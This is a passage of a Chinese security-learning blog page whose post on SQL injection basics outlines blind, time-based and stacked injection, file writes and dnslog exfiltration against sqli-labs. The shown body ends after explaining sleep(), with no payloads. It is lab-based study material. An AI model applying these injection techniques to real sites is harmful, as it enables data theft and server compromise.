<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <title>SQL注入基础2 | bulaize2023</title>
  <meta name="keywords" content=" SQL注入 ">
  <meta name="description" content="SQL注入基础2 | bulaize2023">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="User-Agent：标识浏览器的详细信息，包括名称、版本、操作系统等。 Accept：指定客户端接受的数据类型，可以是文本、HTML、XML、JSON 等等。 Accept-Encoding：指定客户端可以接受的压缩编码类型，如 gzip、deflate 等。 Accept-Language：指定客户端接受的语言类型和优先级。 Cache-Control：指定客户端的缓存策略，如 no-cac">
<meta property="og:type" content="article">
<meta property="og:title" content="HTTP请求头和网页状态码">
<meta property="og:url" content="http://example.com/2024/08/19/12.HTTP%E8%AF%B7%E6%B1%82%E5%A4%B4/index.html">
<meta property="og:site_name" content="bulaize2023">
<meta property="og:description" content="User-Agent：标识浏览器的详细信息，包括名称、版本、操作系统等。 Accept：指定客户端接受的数据类型，可以是文本、HTML、XML、JSON 等等。 Accept-Encoding：指定客户端可以接受的压缩编码类型，如 gzip、deflate 等。 Accept-Language：指定客户端接受的语言类型和优先级。 Cache-Control：指定客户端的缓存策略，如 no-cac">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1724204786808-e0f2fcda-b0db-470d-ad2a-7be6e65309e2.png#averageHue=%23dde1de&clientId=uc378e660-d8a2-4&from=paste&height=339&id=u29f2bd92&originHeight=424&originWidth=717&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=224244&status=done&style=none&taskId=u0ec3399f-3191-4261-96f7-845cf4c7437&title=&width=573.6">
<meta property="article:published_time" content="2024-08-19T10:30:30.000Z">
<meta property="article:modified_time" content="2024-08-31T13:17:01.124Z">
<meta property="article:author" content="bulaize2023">
<meta property="article:tag" content="HTTP">
<meta property="article:tag" content="状态码">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2024/png/40769418/1724204786808-e0f2fcda-b0db-470d-ad2a-7be6e65309e2.png#averageHue=%23dde1de&clientId=uc378e660-d8a2-4&from=paste&height=339&id=u29f2bd92&originHeight=424&originWidth=717&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=224244&status=done&style=none&taskId=u0ec3399f-3191-4261-96f7-845cf4c7437&title=&width=573.6">


<link rel="icon" href="/img/LBJ.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/gruvbox-dark.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/LBJ.jpg"/>
</a>
<div class="author">
    <span>bulaize2023</span>
</div>

<div class="icon">
    
        
            <a title="rss"
               href="/atom.xml"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-rss"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="github"
               href="https://github.com/bulaize2023"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="facebook"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-facebook"></use>
                    </svg>
                
            </a>
        
    
        
    
        
    
        
            <a title="instagram"
               href="https://www.facebook.com/faker.tops"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-instagram"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="reddit"
               href="https://www.reddit.com/user/yelog/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-reddit"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="weibo"
               href="http://weibo.com/u/2307534817"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-weibo"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="jianshu"
               href="https://www.jianshu.com/u/ff56736de7cf"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-jianshu"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="zhihu"
               href="https://www.zhihu.com/people/jaytp/activities"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-zhihu"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="oschina"
               href="https://my.oschina.net/yelog"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-oschina"></use>
                    </svg>
                
            </a>
        
    
        
    
        
            <a title="email"
               href="mailto:1052696084@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1052696084&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="kugou"
               href="https://www.kugou.com/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-kugou"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="neteasemusic"
               href="https://music.163.com/#/user/home?id=88151013"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-neteasemusic"></use>
                    </svg>
                
            </a>
        
    
</div>





<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(28)</small>
            
        </div>
    </li>
    
        
            
                
    <li>
        <div data-rel="第一周">
            
            第一周
            <small>(7)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="第一阶段">
            
            第一阶段
            <small>(12)</small>
        </div>
        
    </li>

            
        
    
        
            
                
    <li>
        <div data-rel="第二阶段">
            
            第二阶段
            <small>(7)</small>
        </div>
        
    </li>

            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="28">
<input type="hidden" id="yelog_site_word_count" value="17k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://yelog.org/">叶落阁</a></li>
            
            <li><a target="_blank" href="https://bulaize2023.github.io/">bulaize2023</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>宝塔</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>博客</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>钓鱼</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>谷歌</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>计算机网络</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>软件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>社工库</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>网站</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文章</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息收集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>语雀</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>状态码</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>day02</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>DNS</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>docker</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>GitHub</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>hexo</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>HTML</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>HTTP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MYSQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>nmap</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>SQL注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>vue</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>WEB漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>XSS</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 "
           href="/2024/08/31/hello-world/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Hello World">Hello World</span>
            <span class="post-date" title="2024-08-31 20:43:38">2024/08/31</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/08/19/12.HTTP%E8%AF%B7%E6%B1%82%E5%A4%B4/"
           data-tag="HTTP,状态码"
           data-author="" >
            <span class="post-title" title="HTTP请求头和网页状态码">HTTP请求头和网页状态码</span>
            <span class="post-date" title="2024-08-19 18:30:30">2024/08/19</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/24/5.SQL%E6%B3%A8%E5%85%A53/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="SQL注入基础3">SQL注入基础3</span>
            <span class="post-date" title="2024-07-24 20:50:30">2024/07/24</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/24/6.DNS%E8%A7%A3%E6%9E%90/"
           data-tag="DNS"
           data-author="" >
            <span class="post-title" title="DNS解析">DNS解析</span>
            <span class="post-date" title="2024-07-24 20:50:30">2024/07/24</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/23/4.SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%802/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="SQL注入基础2">SQL注入基础2</span>
            <span class="post-date" title="2024-07-23 20:50:30">2024/07/23</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/22/3.SQL%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%801/"
           data-tag="SQL注入"
           data-author="" >
            <span class="post-title" title="SQL注入基础1">SQL注入基础1</span>
            <span class="post-date" title="2024-07-22 20:50:30">2024/07/22</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/22/2.%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"
           data-tag="信息收集"
           data-author="" >
            <span class="post-title" title="信息收集">信息收集</span>
            <span class="post-date" title="2024-07-22 20:30:30">2024/07/22</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/22/1.%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/"
           data-tag="谷歌"
           data-author="" >
            <span class="post-title" title="谷歌语法">谷歌语法</span>
            <span class="post-date" title="2024-07-22 19:50:30">2024/07/22</span>
        </a>
        
        
        <a  class="全部文章 第二阶段 "
           href="/2024/07/20/xss%E6%BC%8F%E6%B4%9E/"
           data-tag="XSS,WEB漏洞"
           data-author="" >
            <span class="post-title" title="XSS漏洞">XSS漏洞</span>
            <span class="post-date" title="2024-07-20 18:30:30">2024/07/20</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/19/11.Linux%E5%AE%89%E8%A3%85%E5%AE%9D%E5%A1%94%E5%B9%B6%E6%90%AD%E5%BB%BA%E7%BD%91%E7%AB%99/"
           data-tag="网站,Linux,宝塔"
           data-author="" >
            <span class="post-title" title="Linux安装宝塔并搭建网站">Linux安装宝塔并搭建网站</span>
            <span class="post-date" title="2024-07-19 18:30:30">2024/07/19</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/19/10.%E4%BD%BF%E7%94%A8docker%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/"
           data-tag="博客,docker"
           data-author="" >
            <span class="post-title" title="使用docker搭建个人博客">使用docker搭建个人博客</span>
            <span class="post-date" title="2024-07-19 18:10:30">2024/07/19</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/19/9.Linux%E9%85%8D%E7%BD%AESSH/"
           data-tag="Linux"
           data-author="" >
            <span class="post-title" title="Linux配置SSH服务">Linux配置SSH服务</span>
            <span class="post-date" title="2024-07-19 18:00:30">2024/07/19</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/19/8.Linux%E6%9B%B4%E6%8D%A2%E9%95%9C%E5%83%8F%E6%BA%90%E5%B9%B6%E4%B8%8B%E8%BD%BD%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7/"
           data-tag="Linux"
           data-author="" >
            <span class="post-title" title="Linux更换镜像源并下载常用工具">Linux更换镜像源并下载常用工具</span>
            <span class="post-date" title="2024-07-19 17:30:30">2024/07/19</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/19/7.Linux%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4/"
           data-tag="Linux"
           data-author="" >
            <span class="post-title" title="Linux基础命令">Linux基础命令</span>
            <span class="post-date" title="2024-07-19 16:09:30">2024/07/19</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/16/6.vue+php%E5%AE%8C%E5%96%84%E7%BD%91%E7%AB%99%E5%88%A0%E9%99%A4%E5%92%8C%E7%BC%96%E8%BE%91%E5%8A%9F%E8%83%BD/"
           data-tag="vue,php,网站"
           data-author="" >
            <span class="post-title" title="vue+php完善网站删除和编辑功能">vue+php完善网站删除和编辑功能</span>
            <span class="post-date" title="2024-07-16 20:09:30">2024/07/16</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/15/5.vue+php%E6%90%AD%E5%BB%BA%E7%BD%91%E7%AB%99%E4%B8%BB%E9%A1%B5/"
           data-tag="vue,php,网站"
           data-author="" >
            <span class="post-title" title="vue+php搭建网站首页">vue+php搭建网站首页</span>
            <span class="post-date" title="2024-07-15 20:09:30">2024/07/15</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/13/4.vue+php%E6%90%AD%E5%BB%BA%E7%99%BB%E5%BD%95%E7%BD%91%E7%AB%99/"
           data-tag="vue,php,网站"
           data-author="" >
            <span class="post-title" title="vue+php搭建登录网站">vue+php搭建登录网站</span>
            <span class="post-date" title="2024-07-13 19:42:30">2024/07/13</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/12/1.HTML%E5%9F%BA%E7%A1%80/"
           data-tag="HTML"
           data-author="" >
            <span class="post-title" title="HTML基础">HTML基础</span>
            <span class="post-date" title="2024-07-12 20:50:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/12/3.MySQL%E5%9F%BA%E7%A1%80/"
           data-tag="MYSQL"
           data-author="" >
            <span class="post-title" title="MYSQL基础">MYSQL基础</span>
            <span class="post-date" title="2024-07-12 20:30:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/12/%E5%88%A9%E7%94%A8GitHub%E6%90%AD%E5%BB%BAhexo%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/"
           data-tag="GitHub,hexo,博客"
           data-author="" >
            <span class="post-title" title="利用GitHub搭建hexo博客">利用GitHub搭建hexo博客</span>
            <span class="post-date" title="2024-07-12 20:11:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/12/%E5%88%B6%E4%BD%9Cpython%E9%92%93%E9%B1%BC%E7%BD%91%E7%AB%99/"
           data-tag="python,钓鱼"
           data-author="" >
            <span class="post-title" title="制作python钓鱼网站">制作python钓鱼网站</span>
            <span class="post-date" title="2024-07-12 20:11:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/12/%E7%A4%BE%E5%B7%A5%E5%BA%93/"
           data-tag="社工库"
           data-author="" >
            <span class="post-title" title="社工库">社工库</span>
            <span class="post-date" title="2024-07-12 20:00:30">2024/07/12</span>
        </a>
        
        
        <a  class="全部文章 第一阶段 "
           href="/2024/07/11/2.php%E5%9F%BA%E7%A1%80/"
           data-tag="PHP"
           data-author="" >
            <span class="post-title" title="PHP基础">PHP基础</span>
            <span class="post-date" title="2024-07-11 20:11:30">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/11/day3/"
           data-tag="计算机网络,nmap"
           data-author="" >
            <span class="post-title" title="day03.计算机网络基础与nmap端口扫描">day03.计算机网络基础与nmap端口扫描</span>
            <span class="post-date" title="2024-07-11 19:11:30">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/11/day2/"
           data-tag="day02"
           data-author="" >
            <span class="post-title" title="day02">day02</span>
            <span class="post-date" title="2024-07-11 18:11:30">2024/07/11</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/10/day1%EF%BC%9A%E5%AE%89%E8%A3%85%E8%BD%AF%E4%BB%B6/"
           data-tag="软件"
           data-author="" >
            <span class="post-title" title="安装软件">安装软件</span>
            <span class="post-date" title="2024-07-10 19:11:30">2024/07/10</span>
        </a>
        
        
        <a  class="全部文章 第一周 "
           href="/2024/07/10/%E8%AF%AD%E9%9B%80%E4%B8%8A%E4%BC%A0%E6%96%87%E7%AB%A0/"
           data-tag="语雀,文章"
           data-author="" >
            <span class="post-title" title="语雀上传文章">语雀上传文章</span>
            <span class="post-date" title="2024-07-10 19:11:30">2024/07/10</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2024/07/10/test1/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="test1">test1</span>
            <span class="post-date" title="2024-07-10 15:52:50">2024/07/10</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-4.SQL注入基础2" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">SQL注入基础2</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="第二阶段">第二阶段</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color1">SQL注入</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2024-07-23 22:25:24'>2024-07-23 20:50</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:2k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#1-%E7%9B%B8%E5%85%B3%E5%87%BD%E6%95%B0"><span class="toc-text">1.相关函数</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-1sleep"><span class="toc-text">1.1sleep()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-2if"><span class="toc-text">1.2if()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-3length"><span class="toc-text">1.3length()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-4mid"><span class="toc-text">1.4mid()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-5-substr-%E5%92%8Csubstring"><span class="toc-text">1.5 substr()和substring()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-6left"><span class="toc-text">1.6left()</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1-7ascii"><span class="toc-text">1.7ascii()</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2-%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-text">2.布尔盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#2-1%E4%BB%80%E4%B9%88%E6%98%AF%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-text">2.1什么是布尔盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-2%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="toc-text">2.2如何进行布尔盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-3sqli-labs%E7%AC%AC5%E5%85%B3%E5%AE%9E%E6%88%98"><span class="toc-text">2.3sqli-labs第5关实战</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3-%E6%8A%A5%E9%94%99%E7%9B%B2%E6%B3%A8"><span class="toc-text">3.报错盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#3-1%E4%BB%80%E4%B9%88%E6%98%AF%E6%8A%A5%E9%94%99%E7%9B%B2%E6%B3%A8"><span class="toc-text">3.1什么是报错盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-2%E6%8A%A5%E9%94%99%E7%9B%B2%E6%B3%A8%E7%9A%84%E5%89%8D%E6%8F%90"><span class="toc-text">3.2报错盲注的前提</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-3-%E5%B8%B8%E8%A7%81%E7%9A%84%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5%E5%87%BD%E6%95%B0"><span class="toc-text">3.3. 常见的报错注入函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-4%E5%AE%9E%E6%88%98-sqli-labs%E7%AC%AC1%E5%85%B3"><span class="toc-text">3.4实战 sqli-labs第1关</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4-%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-text">4.时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#4-1%E4%BB%80%E4%B9%88%E6%98%AF%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-text">4.1什么是时间盲注</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-2%E5%BA%94%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="toc-text">4.2应用场景</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-3%E5%BC%8A%E7%AB%AF"><span class="toc-text">4.3弊端</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-4%E5%AE%9E%E6%88%98%EF%BC%9Asqli-labs%E7%AC%AC9%E5%85%B3"><span class="toc-text">4.4实战：sqli-labs第9关</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="toc-text">5.堆叠注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#5-1%E4%BB%80%E4%B9%88%E6%98%AF-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="toc-text">5.1什么是 堆叠注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-2%E5%AE%9E%E6%88%98%EF%BC%9Asqli-labs%E7%AC%AC38%E5%85%B3"><span class="toc-text">5.2实战：sqli-labs第38关</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6-%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99"><span class="toc-text">6.文件读写</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#6-1%E5%89%8D%E6%8F%90"><span class="toc-text">6.1前提</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-2%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99%E6%B3%A8%E5%85%A5%E7%9A%84%E5%8E%9F%E7%90%86"><span class="toc-text">6.2文件读写注入的原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-3%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6"><span class="toc-text">6.3读取文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-4%E5%86%99%E5%85%A5%E6%96%87%E4%BB%B6"><span class="toc-text">6.4写入文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-5%E5%AE%9E%E6%88%98%EF%BC%9Asqli-labs%E7%AC%AC7%E5%85%B3"><span class="toc-text">6.5实战：sqli-labs第7关</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#7-dnslog-cn%E4%BD%BF%E7%94%A8"><span class="toc-text">7.dnslog.cn使用</span></a></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="1-相关函数"><a href="#1-相关函数" class="headerlink" title="1.相关函数"></a>1.相关函数</h1><h2 id="1-1sleep"><a href="#1-1sleep" class="headerlink" title="1.1sleep()"></a>1.1sleep()</h2><p>Sleep 函数可以使计算机程序（进程，任务或线程）进入休眠<br>比如：我们在正常查数据时的正常速度<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736656569-a729ee94-e1ba-441f-9337-683c46aec7b3.png#averageHue=%23151413&clientId=u9a79f967-2f20-4&from=paste&height=174&id=ue9796f86&originHeight=218&originWidth=452&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=395082&status=done&style=none&taskId=u9c2f9303-4b19-4b3a-934e-3b175fe6119&title=&width=361.6" alt="image.png"><br>这是使用sleep函数后的速度<img src="https://cdn.nlark.com/yuque/0/2024/png/40769418/1721736688520-0d03d5ad-bb58-4d0d-9849-3cdd87d7c6e5.png#averageHue=%23121110&clientId=u9a79f967-2f20-4&from=paste&height=71&id=u861d43b8&originHeight=89&originWidth=548&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=195567&status=done&style=none&taskId=u8c4afbcf-387e-43df-89ea-ac663cf18f4&title=&width=438.4" alt="image.png"><br>因为有两条数据所以花了6秒钟</p>
